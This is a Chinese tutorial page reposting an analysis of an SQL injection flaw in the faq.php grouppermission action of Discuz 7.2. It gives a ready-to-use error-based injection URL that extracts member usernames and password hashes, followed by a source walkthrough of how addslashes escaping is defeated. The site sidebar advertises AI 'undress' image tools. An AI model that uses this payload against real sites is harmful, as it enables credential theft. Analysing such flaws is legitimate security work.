Discuz7.2版的faq.php SQL注入漏洞分析-php手册-php.cn

Home

php教程

php手册

Discuz7.2版的faq.php SQL注入漏洞分析

WBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWB

Jun 06, 2016 pm 08:19 PM

这篇文章主要介绍了Discuz7.2版的faq.php SQL注入漏洞分析,包含注入代码和源码分析,需要的朋友可以参考下

注入代码实例:

复制代码代码如下:

?action=grouppermission&gids[99]=%27&gids[100][0]=) and (select 1 from (select count(*),concat((select (select (select concat(username,0x20,password) from cdb_members limit 0,1) ) from `information_schema`.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)%23

漏洞分析： by phithon

复制代码代码如下:

($action == 'grouppermission') {

...
        ksort($gids);
        $groupids = array();
        foreach($gids as $row) {
                $groupids[] = $row[0];
        }

        $query = $db->query("SELECT * FROM {$tablepre}usergroups u LEFT JOIN {$tablepre}admingroups a ON u.groupid=a.admingid WHERE u.groupid IN (".implodeids($groupids).")");
...
}
function implodeids($array) {
        if(!empty($array)) {
                return "'".implode("','", is_array($array) ? $array : array($array))."'";
        } else {
                return '';
        }
}

首先定义一个数组groupids，，然后遍历$gids（这也是个数组，就是$_GET[gids]），将数组中的所有值的第一位取出来放在groupids中。

为什么这个操作就造成了注入？

discuz在全局会对GET数组进行addslashes转义，也就是说会将'转义成\'，所以，如果我们的传入的参数是：gids[1]='的话，会被转义成$gids[1]=\'，而这个赋值语句$groupids[] = $row[0]就相当于取了字符串的第一个字符，也就是\，把转义符号取出来了。

再看后面，在将数据放入sql语句前，他用implodeids处理了一遍。我们看到implodeids函数

很简单一个函数，就是将刚才的$groupids数组用','分割开，组成一个类似于'1','2','3','4'的字符串返回。

但是我们的数组刚取出来一个转义符，它会将这里一个正常的'转义掉，比如这样：
'1','\','3','4'
有没有看出有点不同，第4个单引号被转义了，也就是说第5个单引号和第3个单引号闭合。

Statement

The content of this article is voluntarily contributed by netizens, and the copyright belongs to the original author. This site does not assume corresponding legal responsibility. If you find any content suspected of plagiarism or infringement, please contact admin@php.cn

Hot AI Tools

Undresser.AI Undress

AI-powered app for creating realistic nude photos

AI Clothes Remover

Online AI tool for removing clothes from photos.

Undress AI Tool

Undress images for free

Clothoff.io

AI clothes remover

AI Hentai Generator

Generate AI Hentai for free.

Hot Article

R.E.P.O. Energy Crystals Explained and What They Do (Yellow Crystal)

1 months agoBy尊渡假赌尊渡假赌尊渡假赌

R.E.P.O. Best Graphic Settings

1 months agoBy尊渡假赌尊渡假赌尊渡假赌

Assassin's Creed Shadows: Seashell Riddle Solution

2 weeks agoByDDD

R.E.P.O. How to Fix Audio if You Can't Hear Anyone

1 months agoBy尊渡假赌尊渡假赌尊渡假赌

R.E.P.O. Chat Commands and How to Use Them

1 months agoBy尊渡假赌尊渡假赌尊渡假赌

Hot Tools

SublimeText3 English version

Recommended: Win version, supports code prompts!

SecLists

SecLists is the ultimate security tester's companion. It is a collection of various types of lists that are frequently used during security assessments, all in one place. SecLists helps make security testing more efficient and productive by conveniently providing all the lists a security tester might need. List types include usernames, passwords, URLs, fuzzing payloads, sensitive data patterns, web shells, and more. The tester can simply pull this repository onto a new test machine and he will have access to every type of list he needs.